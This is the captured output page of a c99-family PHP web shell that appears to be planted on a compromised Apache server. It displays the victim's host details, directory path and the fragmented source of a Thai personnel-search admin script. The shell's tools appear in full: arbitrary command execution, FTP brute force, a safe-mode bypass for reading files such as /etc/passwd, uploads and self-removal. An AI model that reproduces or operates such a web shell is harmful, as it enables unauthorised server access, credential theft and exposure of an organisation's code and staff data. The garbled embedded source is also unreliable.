!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/admin/   drwxr-xr-x
Free 52.34 GB of 127.8 GB (40.95%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     searchPsTable.php (23.31 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
SearchByDeptMaxDocGroup($deptId,$oDP->SearchMaxDocGroup()); while($oDlc->GetRecord()){ $oDlc->Edit(); $oDlc->DlcID=$oDlc->DlcID; $oDlc->deptId=$oDlc->deptId; $oDlc->DlpID=$oDlc->DlpID; $oDlc->personId=$oDlc->personId; $oDlc->DlcSeq=$oDlc->DlcSeq; $oDlc->docGroup=$oDlc->docGroup; $oDlc->confirm="Y"; $oDlc->DlcActive=$oDlc->DlcActive; $oDlc->Save(); } ?> SearchByDeptMaxDocGroup($deptId,$oDP->SearchMaxDocGroup()); $checkuse=0; while($oDlc2->GetRecord()){ $oRs->SearchByDlcIDDocGroup2($oDlc2->DlcID,$oDP->SearchMaxDocGroup()); if($oRs->GetRecord()==1){ $checkuse++; } } //echo "checkuse=".$checkuse; if($checkuse=="0"){ $oDlc->SearchByDeptMaxDocGroup($deptId,$oDP->SearchMaxDocGroup()); while($oDlc->GetRecord()){ $oDlc->Delete(); } }else{ ?> SearchByKey($DlcID); if($oDlc->GetRecord()==1){ //edit //echo "A
"; $oDlc->Edit(); $oDlc->DlcID=$DlcID; $oDlc->deptId=$oDlc->deptId; $oDlc->DlpID=$oDlc->DlpID; $oDlc->personId=$personId; $oDlc->DlcSeq=$oDlc->DlcSeq; $oDP->SearchByKey($oDlc->deptId); $oDP->GetRecord(); $oDlc->docGroup=$oDP->docGroup; $oDlc->DlcActive=$oDlc->DlcActive; $oDlc->Save(); if($personId[$r]!="0" && $personId[$r]!=""){ //setUMS($personId[$r],$oDlp->GpID); $oDlp->SearchByKey($oDlc->DlpID); $oDlp->GetRecord(); $oUus->SearchByUsPsCode($personId); $oUus->GetRecord(); echo "----".$oUus->UsID; $oUg->SearchByKey($oDlp->GpID,$oUus->UsID); if($oUg->GetRecord()==0){ $oUg->AddNew(); $oUg->UgID=$oUg->GetNextCode(); echo "UgID=".$oUg->UgID."
"; $oUg->UgGpID=$oDlp->GpID; echo "UgGpID=".$oUg->UgGpID."
"; $oUg->UgUsID=$oUus->UsID; echo "UgUsID=".$oUg->UgUsID."
"; $oUg->Save(); } } }else{ //add new line //echo "B
"; $oDlc1->AddNew(); $oDlc1->DlcID=$DlcID; //echo "DlcID=".$oDlc1->DlcID."
"; $oDlc1->deptId=$deptId; //echo "deptId=".$oDlc1->deptId."
"; $oDlc1->personId=$personId; //echo "personId=".$oDlc1->personId."
"; $oDlc1->DlcSeq=$DlcSeq; //echo "DlcSeq=".$oDlc1->DlcSeq."
"; $oDP->SearchByKey($oDlc1->deptId); $oDP->GetRecord(); $oDlc1->docGroup=$oDP->docGroup; //echo "docGroup=".$oDlc1->docGroup."
"; $oDlc1->Save(); } ?> SearchByKey($DlcID); if($oDlc->GetRecord()==1){ //edit //echo "A
"; $oDlc->Edit(); $oDlc->DlcID=$DlcID; $oDlc->deptId=$oDlc->deptId; $oDlc->DlpID=$oDlc->DlpID; $oDlc->personId=$personId; $oDlc->DlcSeq=$oDlc->DlcSeq; $oDP->SearchByKey($oDlc->deptId); $oDP->GetRecord(); $oDlc->docGroup=$oDP->docGroup; $oDlc->DlcActive=$oDlc->DlcActive; $oDlc->Save(); if($personId[$r]!="0" && $personId[$r]!=""){ //setUMS($personId[$r],$oDlp->GpID); $oDlp->SearchByKey($oDlc->DlpID); $oDlp->GetRecord(); $oUus->SearchByUsPsCode($personId); $oUus->GetRecord(); echo "----".$oUus->UsID; $oUg->SearchByKey($oDlp->GpID,$oUus->UsID); if($oUg->GetRecord()==0){ $oUg->AddNew(); $oUg->UgID=$oUg->GetNextCode(); echo "UgID=".$oUg->UgID."
"; $oUg->UgGpID=$oDlp->GpID; echo "UgGpID=".$oUg->UgGpID."
"; $oUg->UgUsID=$oUus->UsID; echo "UgUsID=".$oUg->UgUsID."
"; $oUg->Save(); } } }else{ //add new line //echo "B
"; $oDlc1->AddNew(); $oDlc1->DlcID=$DlcID; //echo "DlcID=".$oDlc1->DlcID."
"; $oDlc1->deptId=$deptId; //echo "deptId=".$oDlc1->deptId."
"; $oDlc1->personId=$personId; //echo "personId=".$oDlc1->personId."
"; $oDlc1->DlcSeq=$DlcSeq; //echo "DlcSeq=".$oDlc1->DlcSeq."
"; $oDP->SearchByKey($oDlc1->deptId); $oDP->GetRecord(); $oDlc1->docGroup=$oDP->docGroup; //echo "docGroup=".$oDlc1->docGroup."
"; $oDlc1->Save(); } ?> "; //no data }else{ //echo "
D===".$newposition."
"; $oDlc->SearchByKey($DlcID[$r]); $oDlc->GetRecord(); $oDlc->Edit(); // echo "oDlc->DlpID===".$oDlc->DlpID."
"; // echo "DlpID[r]===".$DlpID[$r]."
"; $oDlc->DlcID=$DlcID[$r]; //echo "DlcID=".$oDlc->DlcID."
"; $oDlc->deptId=$oDlc->deptId; //echo "deptId=".$oDlc->deptId."
"; $saveDlpID=$oDlc->DlpID; $oDlp->SearchByKey($DlpID[$r]); $oDlp->GetRecord(); //echo 'DlpPropose='.$oDlp->DlpPropose.'
'; if($oDlp->DlpPID=="0"){ //echo "no edit
"; $oDlc->DlpID=$DlpID[$r]; }else{ //echo "edit=".($DlpID[$r-1])."
"; $oDlp2->SearchDlpPIDByDlpID($DlpID[$r-1]); $oDlp2->GetRecord(); $oDlc->DlpID=$oDlp2->DlpID; $a=1; } $oDlp4->SearchByKey($oDlc->DlpID); $oDlp4->GetRecord(); //----set in ums if($saveDlpID!=$oDlc->DlpID){ $oDlp3->SearchByKey($oDlc->DlpID); $oDlp3->GetRecord(); $oUus->SearchByUsPsCode($personId[$r]); $oUus->GetRecord(); //echo "----".$oUus->UsID; $oUg->SearchByKey($oDlp3->GpID,$oUus->UsID); if($oUg->GetRecord()==0){ $oUg->AddNew(); $oUg->UgID=$oUg->GetNextCode(); //echo "UgID=".$oUg->UgID."
"; $oUg->UgGpID=$oDlp3->GpID; //echo "UgGpID=".$oUg->UgGpID."
"; $oUg->UgUsID=$oUus->UsID; //echo "UgUsID=".$oUg->UgUsID."
"; $oUg->Save(); } } //echo "DlpID=".$oDlc->DlpID."
"; $oDlc->personId=$personId[$r]; //echo "personId=".$oDlc->personId."
"; $oDlc->DlcSeq=$DlcSeq[$r]; //echo "DlcSeq=".$oDlc->DlcSeq."
"; //echo "saveDlpID===".$saveDlpID."
"; //echo "oDlc->DlpID===".$oDlc->DlpID."
"; if($saveDlpID!=$oDlc->DlpID || $newposition=='newposition'){ //echo ' change
'; if($oDlp4->DlpPropose=="Y"){ //echo ' DlpPropose=="Y"
'; $oDlc->DlcPropose='Y'; }else{ //echo ' DlpPropose!="Y"
'; $oDlc->DlcPropose="N"; } //echo "DlcPropose=".$oDlc1->DlcPropose."
"; if($oDlp4->DlpSign=="Y"){ $oDlc->DlcSign='Y'; }else{ $oDlc->DlcSign="N"; } //echo "DlcSign=".$oDlc1->DlcSign."
"; if($oDlp4->DlpSend=="Y"){ $oDlc->DlcSend='Y'; }else{ $oDlc->DlcSend="N"; } //echo "DlcSend=".$oDlc1->DlcSend."
"; if($oDlp4->DlpByPass=="Y"){ $oDlc->DlcByPass='Y'; }else{ $oDlc->DlcByPass="N"; } //echo "DlcByPass=".$oDlc1->DlcByPass."
"; if($oDlp4->DlpView=="Y"){ $oDlc->DlcView='Y'; }else{ $oDlc->DlcView="N"; } }else{ //echo 'no change
'; if($DlcPropose[$r]=="Y"){ $oDlc->DlcPropose=$DlcPropose[$r]; }else{ $oDlc->DlcPropose="N"; } //echo "DlcPropose=".$oDlc->DlcPropose."
"; if($DlcSign[$r]=="Y"){ $oDlc->DlcSign=$DlcSign[$r]; }else{ $oDlc->DlcSign="N"; } //echo "DlcSign=".$oDlc->DlcSign."
"; if($DlcSend[$r]=="Y"){ $oDlc->DlcSend=$DlcSend[$r]; }else{ $oDlc->DlcSend="N"; } //echo "DlcSend=".$oDlc->DlcSend."
"; if($DlcByPass[$r]=="Y"){ $oDlc->DlcByPass=$DlcByPass[$r]; }else{ $oDlc->DlcByPass="N"; } //echo "DlcByPass=".$oDlc->DlcByPass."
"; if($DlcView[$r]=="Y"){ $oDlc->DlcView=$DlcView[$r]; }else{ $oDlc->DlcView="N"; } } //echo "DlcView=".$oDlc->DlcView."
"; $oDP->SearchByKey($oDlc->deptId); $oDP->GetRecord(); $oDlc->docGroup=$oDP->docGroup; //echo "docGroup=".$oDlc->docGroup."
"; if($DlcActive[$r]=="Y"){ $oDlc->DlcActive=$DlcActive[$r]; }else{ $oDlc->DlcActive="N"; } $oDlc->Save(); } //echo "------------------------------------------------
"; } // end if save all config $oDlp->SearchByKey($DlpIDadd); $oDlp->GetRecord(); if($addline=="1" && $showdeptId!="1"){ //if add new line if($DlpIDadd=="0" && $personIdadd=="" && $DlcProposeadd!="Y" && $DlcSignadd!="Y" && $DlcSendadd!="Y" && $DlcByPassadd!="Y" && $DlcViewadd !="Y"){ //echo "E
"; //no data }else{ //echo "F
"; $oDlc1->AddNew(); $oDlc1->DlcID=$DlcIDadd; //echo "DlcID=".$oDlc1->DlcID."
"; $oDlc1->deptId=$deptId; //echo "deptId=".$oDlc1->deptId."
"; $oDlc1->DlpID=$DlpIDadd; //echo "DlpID=".$oDlc1->DlpID."
"; $oDlc1->personId=$personIdadd; //echo "personId=".$oDlc1->personId."
"; $oDlc1->DlcSeq=$DlcSeqadd; //echo "DlcSeq=".$oDlc1->DlcSeq."
"; if($oDlp->DlpPropose=="Y"){ $oDlc1->DlcPropose='Y'; }else{ $oDlc1->DlcPropose="N"; } //echo "DlcPropose=".$oDlc1->DlcPropose."
"; if($oDlp->DlpSign=="Y"){ $oDlc1->DlcSign='Y'; }else{ $oDlc1->DlcSign="N"; } //echo "DlcSign=".$oDlc1->DlcSign."
"; if($oDlp->DlpSend=="Y"){ $oDlc1->DlcSend='Y'; }else{ $oDlc1->DlcSend="N"; } //echo "DlcSend=".$oDlc1->DlcSend."
"; if($oDlp->DlpByPass=="Y"){ $oDlc1->DlcByPass='Y'; }else{ $oDlc1->DlcByPass="N"; } //echo "DlcByPass=".$oDlc1->DlcByPass."
"; if($oDlp->DlpView=="Y"){ $oDlc1->DlcView='Y'; }else{ $oDlc1->DlcView="N"; } //echo "DlcView=".$oDlc1->DlcView."
"; $oDP->SearchByKey($oDlc1->deptId); $oDP->GetRecord(); $oDlc1->docGroup=$oDP->docGroup; //echo "docGroup=".$oDlc1->docGroup."
"; if($DlcActiveadd=="Y"){ $oDlc1->DlcActive=$DlcActiveadd; }else{ $oDlc1->DlcActive="N"; } $oDlc1->Save(); //echo "------------------------------------------------
"; //---------add Parent Dlp $oDlc2->AddNew(); $oDlc2->DlcID=$DlcIDadd+1; // echo "DlcID=".$oDlc2->DlcID."
"; $oDlc2->deptId=$deptId; //echo "deptId=".$oDlc2->deptId."
"; $oDlp2->SearchDlpPIDByDlpID($DlpIDadd); $oDlp2->GetRecord(); //echo '------------'.$oDlp2->DlpPropose.'
'; $oDlc2->DlpID=$oDlp2->DlpID; //echo "DlpID=".$oDlc2->DlpID."
"; $oDlc2->personId=$personIdadd; //echo "personId=".$oDlc2->personId."
"; $oDlc2->DlcSeq=$DlcSeqadd+1; //echo "DlcSeq=".$oDlc2->DlcSeq."
"; if($oDlp2->DlpPropose=="Y"){ $oDlc2->DlcPropose='Y'; }else{ $oDlc2->DlcPropose="N"; } //echo "DlcPropose=".$oDlc2->DlcPropose."
"; if($oDlp2->DlpSign=="Y"){ $oDlc2->DlcSign='Y'; }else{ $oDlc2->DlcSign="N"; } //echo "DlcSign=".$oDlc2->DlcSign."
"; if($oDlp2->DlpSend=="Y"){ $oDlc2->DlcSend='Y'; }else{ $oDlc2->DlcSend="N"; } //echo "DlcSend=".$oDlc2->DlcSend."
"; if($oDlp2->DlpByPass=="Y"){ $oDlc2->DlcByPass='Y'; }else{ $oDlc2->DlcByPass="N"; } //echo "DlcByPass=".$oDlc2->DlcByPass."
"; if($oDlp2->DlpView=="Y"){ $oDlc2->DlcView='Y'; }else{ $oDlc2->DlcView="N"; } //echo "DlcView=".$oDlc2->DlcView."
"; $oDP->SearchByKey($oDlc2->deptId); $oDP->GetRecord(); $oDlc2->docGroup=$oDP->docGroup; //echo "docGroup=".$oDlc2->docGroup."
"; if($DlcActiveadd=="Y"){ $oDlc2->DlcActive=$DlcActiveadd; }else{ $oDlc2->DlcActive="N"; } $oDlc2->Save(); //echo "------------------------------------------------
"; //----------------------------------- } } //end if add new line ?> "; //no data }else{ //echo "D
"; $oDlc->SearchByKey($DlcID[$r]); $oDlc->GetRecord(); $oDlc->Edit(); $oDlc->DlcID=$DlcID[$r]; //echo "DlcID=".$oDlc->DlcID."
"; $oDlc->deptId=$oDlc->deptId; //echo "deptId=".$oDlc->deptId."
"; $saveDlpID=$oDlc->DlpID; $oDlp->SearchByKey($DlpID[$r]); $oDlp->GetRecord(); if($oDlp->DlpPID=="0"){ //echo "no edit
"; $oDlc->DlpID=$DlpID[$r]; }else{ //echo "edit=".($DlpID[$r-1])."
"; $oDlp2->SearchDlpPIDByDlpID($DlpID[$r-1]); $oDlp2->GetRecord(); $oDlc->DlpID=$oDlp2->DlpID; } //----set in ums if($saveDlpID!=$oDlc->DlpID){ $oDlp3->SearchByKey($oDlc->DlpID); $oDlp3->GetRecord(); $oUus->SearchByUsPsCode($personId[$r]); $oUus->GetRecord(); echo "----".$oUus->UsID; $oUg->SearchByKey($oDlp3->GpID,$oUus->UsID); if($oUg->GetRecord()==0){ $oUg->AddNew(); $oUg->UgID=$oUg->GetNextCode(); echo "UgID=".$oUg->UgID."
"; $oUg->UgGpID=$oDlp3->GpID; echo "UgGpID=".$oUg->UgGpID."
"; $oUg->UgUsID=$oUus->UsID; echo "UgUsID=".$oUg->UgUsID."
"; $oUg->Save(); } } //echo "DlpID=".$oDlc->DlpID."
"; $oDlc->personId=$personId[$r]; //echo "personId=".$oDlc->personId."
"; $oDlc->DlcSeq=$DlcSeq[$r]; //echo "DlcSeq=".$oDlc->DlcSeq."
"; if($DlcPropose[$r]=="Y"){ $oDlc->DlcPropose=$DlcPropose[$r]; }else{ $oDlc->DlcPropose="N"; } //echo "DlcPropose=".$oDlc->DlcPropose."
"; if($DlcSign[$r]=="Y"){ $oDlc->DlcSign=$DlcSign[$r]; }else{ $oDlc->DlcSign="N"; } //echo "DlcSign=".$oDlc->DlcSign."
"; if($DlcSend[$r]=="Y"){ $oDlc->DlcSend=$DlcSend[$r]; }else{ $oDlc->DlcSend="N"; } //echo "DlcSend=".$oDlc->DlcSend."
"; if($DlcByPass[$r]=="Y"){ $oDlc->DlcByPass=$DlcByPass[$r]; }else{ $oDlc->DlcByPass="N"; } //echo "DlcByPass=".$oDlc->DlcByPass."
"; if($DlcView[$r]=="Y"){ $oDlc->DlcView=$DlcView[$r]; }else{ $oDlc->DlcView="N"; } //echo "DlcView=".$oDlc->DlcView."
"; $oDP->SearchByKey($oDlc->deptId); $oDP->GetRecord(); $oDlc->docGroup=$oDP->docGroup; //echo "docGroup=".$oDlc->docGroup."
"; if($DlcActive[$r]=="Y"){ $oDlc->DlcActive=$DlcActive[$r]; }else{ $oDlc->DlcActive="N"; } $oDlc->Save(); } //echo "------------------------------------------------
"; } // end if save all config ?> ตารางค้นหาบุคลากร
">   ค้นหารายชื่อบุคลากร
">    ชื่อ - นามสกุล ::  

SearchByName($name); while($oPS->GetRecord()){ if(($i%2) == 0) echo ""; else echo ""; ?>
">   รายชื่อบุคลากร
">ลำดับที่ ">ชื่อ-นามสกุล
"> ">   
"> "> prefixId).$oPS->fName." ".$oPS->lName; ?> prefixId).$oPS->fName." ".$oPS->lName; ?>
หมายเหตุ :: คลิกที่รายชื่อบุคลากรที่ต้องการ
                   กำหนดตำแหน่งงานสารบรรณ
รวม รายการ
[ปิดหน้าต่าง]

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--